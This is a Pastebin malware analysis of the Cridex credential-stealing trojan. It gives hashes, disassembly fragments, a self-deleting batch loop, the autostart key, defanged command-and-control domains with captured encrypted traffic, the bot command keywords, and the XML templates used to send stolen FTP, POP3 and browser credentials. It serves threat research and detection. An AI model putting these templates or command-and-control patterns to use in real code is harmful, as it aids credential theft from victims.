API tools faq
paste
Advertisement
MalwareMustDie

Trojan/PWS Win32/Cridex RETURNS

MalwareMustDie
Jan 15th, 2014
2,097
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.65 KB | None | 0 0
raw download clone embed print report
  1. #------------------------------------------------------------------
  2. # MalwareMustDie | Analysis of Malware Trojan/PWS Win32/Cridex
  3. $ @unixfreaxjp Thursday January 16 2014 -- 02:55:48 +02:00
  4. # hash:
  5. MD5 ebb6072a86ad2496040d1bdd7d12a265
  6. SHA1 027d4d22faf25086040bc779360642c8faab2297
  7. # VT: https://www.virustotal.com/en/file/11643af5fef0079ce95fe2c292e1d8aecfb21dd1afc602f9ca28a8728550809b/analysis/
  8. # Network Traffic: https://www.mediafire.com/?v69oaie9edu2lo0
  9. # Additional- Decoded config by Mr. Kyle Yang (Fortinet) http://pastebin.com/766faxPH
  10. #------------------------------------------------------------------
  11.  
  12. // Binary is packed, CRC is wrong
  13. // Some quick reverse:
  14.  
  15. // ASM Traces:
  16. // Uses Microsoft's Enhanced Cryptographic Provider
  17.  
  18. 00407E80 lea eax, dword ptr [esp+04h]
  19. 00407E84 push eax
  20. 00407E85 push ecx
  21. 00407E86 push 00000000h
  22. 00407E88 push 00000001h
  23. 00407E8A push 00000000h
  24. 00407E8C push edx
  25. 00407E8D call dword ptr [00411044h] CryptDecrypt@ADVAPI32.DLL (Import, 6 Params)
  26. 00407E93 ret function end
  27.  
  28. // Anti debug
  29.  
  30. 00390426 call dword ptr [esi+08h] LdrLoadDll@NTDLL.DLL (Import, Hidden, 4 Params)
  31. 00404360 call dword ptr [00411138h] GetProcessHeap@KERNEL32.DLL (Import, 0 Params)
  32.  
  33. // Simple attempt for (suspected as) VM detection method:
  34.  
  35. 004050AF call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
  36. 004050BB call dword ptr [004110D8h] FindFirstFileW@KERNEL32.DLL (Import, 2 Params)
  37. 00405147 call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
  38. 00405161 call dword ptr [004111E0h] wnsprintfA@SHLWAPI.DLL (Import, Unknown Params)
  39. 00405196 call dword ptr [004110F0h] FindNextFileW@KERNEL32.DLL (Import, 2 Params)
  40. 004051A5 call dword ptr [004111C8h] FindClose@KERNEL32.DLL (Import, 1 Params)
  41.  
  42. // Attempt to self copy:
  43.  
  44. 004010C7 push 0042355Ch ASCII "C:\ghfwhe\pvLxggf\tqPUnrp\oaiQtp\MFhvyp.cia"
  45. 004010CC push 00423530h ASCII "C:\kblTpDb\wgiq\ckblqOQGx\piFnr\SMPgwYGn"
  46. 004010D1 call dword ptr [0041C02Ch] CopyFileA@KERNEL32.DLL (Import, Hidden, 3 Params)
  47. 004010D7 mov dword ptr [00423588h], eax
  48. 004010DC lea eax, dword ptr [004234D8h] UTF-16 "C:\utjDet\dvwtc\txfLv\hjuvaq" (Hidden)
  49. 004010E2 mov dword ptr [004235C8h], eax
  50. 004010E7 push dword ptr [004235C8h]
  51. 004010ED mov eax, dword ptr [004235A0h] 0x00000000
  52. 004010F2 mov dword ptr [ebp-34h], eax
  53. 004010F5 push dword ptr [ebp-34h]
  54. 004010F8 mov dword ptr [004235CCh], eax
  55. 004010FD push dword ptr [004235CCh]
  56. 00401103 push dword ptr [004235D0h]
  57. 00401109 mov dword ptr [ebp-38h], eax
  58. 0040110C push dword ptr [ebp-38h]
  59. 0040110F push dword ptr [004235D4h]
  60. 00401115 push dword ptr [004235D8h]
  61. 0040111B push 0042359Ch ASCII "NUL"
  62. 00401120 call dword ptr [0041C018h] CreateFileA@KERNEL32.DLL (Import, Hidden, 7 Params)
  63.  
  64. // Seeking further...
  65.  
  66. // Batch file for self copy:
  67. @echo off
  68. :R
  69. del /F /Q /A "C:\%sample%.exe"
  70. if exist "C:\%sample%.exe" goto R
  71. del /F /Q /A "%TEMP%\exp1.tmp.bat"
  72.  
  73. // Drops w/file format:
  74. KB%08d.exe (i.e. 4168e4 -> "KB00161095.exe")
  75.  
  76. // Self duplication flooded the test bed:
  77.  
  78. sample.exe (PID: 2032 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  79. cmd.exe (PID: 1400 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp1.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  80. KB00161095.exe (PID: 1236 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  81. cmd.exe (PID: 1268 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp2.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  82. KB00082345.exe (PID: 1892 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  83. cmd.exe (PID: 488 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp3.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  84. KB00731095.exe (PID: 1832 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  85. cmd.exe (PID: 1776 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp4.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  86. KB01378595.exe (PID: 1168 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  87. cmd.exe (PID: 1528 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp5.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  88. KB00942141.exe (PID: 1320 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  89. cmd.exe (PID: 1772 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp6.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  90. KB00003595.exe (PID: 352 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  91. cmd.exe (PID: 900 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp7.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  92. KB00029540.exe (PID: 2000 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  93. cmd.exe (PID: 424 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp8.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  94. KB00854540.exe (PID: 220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  95. cmd.exe (PID: 1060 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp9.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  96. KB01150790.exe (PID: 632 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  97. cmd.exe (PID: 2024 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expA.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  98. KB01044540.exe (PID: 1584 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  99. cmd.exe (PID: 2472 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expB.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  100. KB01193090.exe (PID: 2176 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  101. cmd.exe (PID: 2852 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expC.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  102. KB00740891.exe (PID: 3528 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  103. cmd.exe (PID: 2928 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expD.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  104. KB00668290.exe (PID: 2792 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  105. cmd.exe (PID: 3408 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expE.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  106. KB00616461.exe (PID: 868 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  107. cmd.exe (PID: 3340 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expF.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  108. KB01448595.exe (PID: 3220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  109. cmd.exe (PID: 3984 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp10.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  110. KB00933391.exe (PID: 3860 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  111. cmd.exe (PID: 596 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp11.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  112. KB00234437.exe (PID: 896 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  113. cmd.exe (PID: 2484 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp12.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  114. KB00688187.exe (PID: 2404 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  115. cmd.exe (PID: 3172 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp13.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  116. KB00677040.exe (PID: 3180 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  117.  
  118. // Autostart:
  119.  
  120. Software\Microsoft\Windows\CurrentVersion\Run
  121.  
  122. // Detect browsers:
  123.  
  124. 4112d8 -> firefox.exe
  125. 4112f0 -> explorer.exe
  126. 4112c0 -> chrome.exe
  127.  
  128. // This is the cyvber crime evidence part....
  129.  
  130. // CNC LIST:
  131.  
  132. h00p://portasible.ru
  133. h00p://ssshsecur.ru
  134. h00p://glebstark.ru
  135. h00p://kuchereneltd.ru
  136.  
  137. // CNC Request:
  138.  
  139. POST /PHVxGBAAAAA/yir2HD/99ocWCAAA/ HTTP/1.1
  140. Accept: */*
  141. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  142. Host: kuchereneltd.ru
  143. Content-Length: 338
  144. Connection: Keep-Alive
  145. Cache-Control: no-cache
  146.  
  147. 000000E0 0a .
  148. 000000E1 8d 6c 6d d8 7b 67 37 69 bd 95 d2 34 30 ca 6b 51 .lm.{g7i ...40.kQ
  149. 000000F1 9e a4 d2 11 b3 27 27 36 bb 12 c2 b8 82 29 35 f4 .....''6 .....)5.
  150. 00000101 c4 4e 50 5b 54 cb 89 7d b0 97 63 43 cc 00 81 8b .NP[T..} ..cC....
  151. 00000111 fa 46 0b 3b e7 29 0d ac 9e 75 12 f1 95 a6 70 dd .F.;.).. .u....p.
  152. 00000121 af a8 9d 09 7e fd 3a a6 92 c9 b7 96 78 d7 79 bf ....~.:. ....x.y.
  153. 00000131 25 90 51 dd 1b 30 41 df a2 53 83 56 f5 bd bf ea %.Q..0A. .S.V....
  154. 00000141 69 aa ef fa db d1 05 c9 ca f5 44 ae e2 df 58 d5 i....... ..D...X.
  155. 00000151 28 36 31 a4 57 f4 b0 a6 79 c8 f9 d9 42 18 ae 96 (61.W... y...B...
  156. 00000161 e9 e2 cf f7 c9 9f 50 f9 67 48 e7 49 8b 4b 90 5f ......P. gH.I.K._
  157. 00000171 fc eb 77 82 89 df 13 7a 09 f3 b1 96 69 26 cd ad ..w....z ....i&..
  158. 00000181 9b 64 b8 49 eb 3f 35 d7 a5 50 b9 e2 f0 c4 49 6c .d.I.?5. .P....Il
  159. 00000191 d3 97 85 76 76 88 2d 61 2d 2f e5 8d 5a 7a 4c 59 ...vv.-a -/..ZzLY
  160. 000001A1 90 68 5a ab 96 db 9c b3 41 51 ed f0 94 2b f8 8a .hZ..... AQ...+..
  161. 000001B1 8c c8 a0 b4 79 4c bc 5a 93 ee 5f 4f 1e 2f 5e aa ....yL.Z .._O./^.
  162. 000001C1 20 9b 8c 5c d4 f1 bb f0 b0 b1 d4 e6 6d 67 35 6f ..\.... ....mg5o
  163. 000001D1 3c 94 1c 6a 5e 1d fb ce 49 80 81 3a 77 4d 72 94 <..j^... I..:wMr.
  164. 000001E1 c6 15 6d 00 9d d9 fe 98 af 80 19 6d 1f c6 c6 0e ..m..... ...m....
  165. 000001F1 fe 5a 61 16 dc 1f ca b1 77 c3 2e 95 97 8e 3d f2 .Za..... w.....=.
  166. 00000201 91 24 df 99 e4 cb 13 35 76 20 4d cd 21 91 13 42 .$.....5 v M.!..B
  167. 00000211 67 ac 49 85 cb 5e 3e b1 8d c0 e4 13 6a dc ad 61 g.I..^>. ....j..a
  168. 00000221 7f 68 0d c4 e4 27 85 00 89 58 dc 57 b9 6d 4c 98 .h...'.. .X.W.mL.
  169. 00000231 4d 93 M.
  170.  
  171.  
  172. // HTTP POST SENT FORMAT:
  173.  
  174. // headers written in binary (for IOC or YARA)
  175.  
  176. Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  177. HTTP/1.1 200 OK Connection: close
  178. application/x-www-form-urlencoded
  179. multipart/form-data
  180. Content-Disposition: attachment; filename=%S
  181.  
  182. // CNC/Botnet Related commands:
  183.  
  184. formgrabber
  185. commands
  186. allow
  187. deny
  188. redirect
  189. https
  190. bconnect
  191. type
  192. settings
  193. actions
  194. httpinjects
  195. pattern
  196. process
  197. send
  198. exec
  199. socket
  200. select
  201. httpshots
  202. closesocket
  203.  
  204.  
  205. // Two HTTP methods connectivity traced:
  206.  
  207. HTTP/1.1
  208. HTTP/1.0
  209.  
  210. // CREDENTIAL STEALER TEMPLATE
  211. // template used to sent credentials withot credential/before encrypted:
  212.  
  213. 4118b0 -> <message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"> // Opearing system
  214. <header>
  215. <unique>%%.%us</unique>
  216. <version>%%u</version>
  217. <system>%%u</system>
  218. <network>%%u</network>
  219. </header><data>
  220. 411a3c -> </data></message>
  221.  
  222. 411730: <pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server> //pop3 mail
  223. <user><![CDATA[%%.%us]]></user><pass><![CDATA[
  224. 4117a4 -> ]]></pass></pop3>
  225.  
  226. 411850: <ff time="%u"><data><![CDATA[ // firefox
  227. 411870: ]]></data></ff>
  228.  
  229. 411880: <mm time="%u"><data><![CDATA[ // mm? macromedia?
  230.  
  231. 4118a0 -> ]]></data></mm>
  232.  
  233. 4117d0: <cert time="%u"><pass><![CDATA[ // certification/pwd
  234. 4117f0: ]]></pass><data><![CDATA[
  235. 41180c -> ]]></data></cert>
  236.  
  237. 411648: <httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[ //links
  238. 41168c -> ]]></data></httpshot>
  239.  
  240. 4116a8: <ftp time="%%%uu"><server> // FTP credential sender format:
  241. <![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
  242. <user><![CDATA[%%.%us]]></user><pass><![CDATA[
  243. 41171c: ]]></pass></ftp>
  244.  
  245. 4115c8: <http time="%%%uu"> // links
  246. <url><![CDATA[%%.%us]]></url>
  247. <useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
  248. 411634 -> ]]></data></http>
  249.  
  250. 411820: <ie time="%u"><data><![CDATA[
  251. 411840 -> ]]></data></ie>
  252.  
  253. // CNC Response
  254.  
  255. HTTP/1.1 200 OK
  256. Server: nginx/1.2.1
  257. Date: Wed, 15 Jan 2014 23:09:22 GMT
  258. Content-Type: text/html
  259. Transfer-Encoding: chunked
  260. Connection: keep-alive
  261. X-Powered-By: PHP/5.4.4-14+deb7u7
  262. Vary: Accept-Encoding
  263.  
  264. 000000D0 0d 0a 0d 0a 62 36 38 37 0d 0a 1e 06 31 bd 7f b1 ....b687 ....1...
  265. 000000E0 66 f9 5e c2 33 44 02 05 c3 71 7c 6e ff 4d 12 93 f.^.3D.. .q|n.M..
  266. 000000F0 a7 a6 28 ae 99 db dc d0 77 fc e6 66 c2 f0 15 5d ..(..... w..f...]
  267. 00000100 d9 e2 5f ab 92 11 2a 51 4d ca f4 17 e8 b9 a2 96 .._...*Q M.......
  268. 00000110 d9 1e 40 1f 87 00 76 f2 d8 e9 14 4c 1f 1f 30 97 ..@...v. ...L..0.
  269. 00000120 68 52 14 af 87 63 19 80 06 8e 04 77 6e 48 c9 ca hR...c.. ...wnH..
  270. 00000130 5f b9 db 8a 40 b7 74 e0 93 4a 0a 9e 55 b8 14 b8 _...@.t. .J..U...
  271. 00000140 5c ba ce c8 80 6b fb d3 c2 66 72 ec 65 aa bf f6 \....k.. .fr.e...
  272. 00000150 fe 3c 42 74 8c e7 27 b1 39 a9 da 39 a3 ee 5e 6b .<Bt..'. 9..9..^k
  273. 00000160 4b 0d 32 55 bf ef 95 60 18 90 af d8 07 09 89 c2 K.2U...` ........
  274. 00000170 17 6a 11 f7 a2 cd 75 26 cd ad b0 65 b7 5d f0 22 .j....u& ...e.]."
  275. 00000180 7f 94 f6 4a e1 b1 97 d1 1d 28 da d0 80 64 66 9e ...J.... .(...df.
  276.  
  277. [...]
  278.  
  279. 0000B6B8 6d 13 6c 3f f1 15 1c f5 d2 75 f7 3c ca 66 f9 18 m.l?.... .u.<.f..
  280. 0000B6C8 c9 80 a0 7f 4b 07 01 e7 3b b7 d8 0f a0 ce 3a 1e ....K... ;.....:.
  281. 0000B6D8 5c 58 9f 2d e8 98 fe 23 b1 06 ab 96 94 9c 84 1e \X.-...# ........
  282. 0000B6E8 09 e5 10 11 28 05 61 c8 a4 96 22 b8 4f 10 5a 57 ....(.a. ..".O.ZW
  283. 0000B6F8 c8 2e 23 2b 91 ad 16 fe 92 9c 5d e4 57 0c b6 bb ..#+.... ..].W...
  284. 0000B708 0a 47 bf 77 30 c2 01 e7 c4 7f b1 a0 5c 8c 70 4b .G.w0... ....\.pK
  285. 0000B718 6f e0 72 8e 2a 40 8a 10 c9 f0 f0 78 cf 09 c3 8b o.r.*@.. ...x....
  286. 0000B728 d2 a0 20 78 18 92 46 67 eb 86 d8 03 9c 30 96 da .. x..Fg .....0..
  287. 0000B738 46 05 ad 52 65 b6 d8 41 d3 52 5a d5 21 f9 64 54 F..Re..A .RZ.!.dT
  288. 0000B748 08 7d b1 83 73 8a ee a1 77 f8 fb f0 2a 82 cf 94 .}..s... w...*...
  289. 0000B758 df c2 94 7c 87 d6 6e 18 a4 0d 0a 30 0d 0a 0d 0a ...|..n. ...0....
  290.  
  291. // One Domain used as CNC is CURRENTLY ALIVE!!
  292.  
  293. FYI, one of the domains still active serving malware:
  294.  
  295. $ date
  296. Thu Jan 16 11:09:48 JST 2014
  297.  
  298. $ dig kuchereneltd.ru
  299.  
  300. ; <<>> DiG 9.2.5 <<>> kuchereneltd.ru
  301. ;; global options: printcmd
  302. ;; Got answer:
  303. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17040
  304. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 10
  305.  
  306. ;; QUESTION SECTION:
  307. ;kuchereneltd.ru. IN A
  308.  
  309. ;; ANSWER SECTION:
  310. kuchereneltd.ru. 3600 IN A 94.76.240.56
  311.  
  312. ;; AUTHORITY SECTION:
  313. kuchereneltd.ru. 3600 IN NS ns2.reg.ru.
  314. kuchereneltd.ru. 3600 IN NS ns1.reg.ru.
  315.  
  316. ;; ADDITIONAL SECTION:
  317. ns2.reg.ru. 2518 IN A 31.31.205.74
  318. ns2.reg.ru. 2518 IN A 88.212.207.122
  319. ns2.reg.ru. 2518 IN A 198.100.149.22
  320. ns2.reg.ru. 2518 IN A 31.31.205.56
  321. ns1.reg.ru. 3046 IN A 31.31.205.73
  322. ns1.reg.ru. 3046 IN A 31.31.204.25
  323. ns1.reg.ru. 3046 IN A 31.31.204.37
  324. ns1.reg.ru. 3046 IN A 31.31.204.52
  325. ns1.reg.ru. 3046 IN A 31.31.205.39
  326. ns1.reg.ru. 3046 IN A 31.31.205.55
  327.  
  328. ;; Query time: 275 msec
  329. ;; SERVER: 202.238.95.24#53(202.238.95.24)
  330. ;; WHEN: Thu Jan 16 11:09:13 2014
  331. ;; MSG SIZE rcvd: 249
  332.  
  333. domain: KUCHERENELTD.RU
  334. nserver: ns1.reg.ru.
  335. nserver: ns2.reg.ru.
  336. state: REGISTERED, DELEGATED, UNVERIFIED
  337. person: Private Person
  338. registrar: REGRU-REG-RIPN
  339. admin-contact: http://www.reg.ru/whois/admin_contact
  340. created: 2014.01.06
  341. paid-till: 2015.01.06
  342. free-date: 2015.02.06
  343. source: TCI
  344. Last updated on 2014.01.16 06:06:36 MSK
  345.  
  346. $ myget -d kuchereneltd.ru
  347.  
  348. GET / HTTP/1.1
  349. Accept: */*
  350. Host: kuchereneltd.ru
  351.  
  352. Server: nginx/1.2.1
  353. Date: Thu, 16 Jan 2014 02:26:47 GMT
  354. Content-Type: text/html
  355. Transfer-Encoding: chunked
  356. Connection: keep-alive
  357.  
  358. ---
  359. #MalwareMustDie!
  360. " Thou shalt not steal.."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!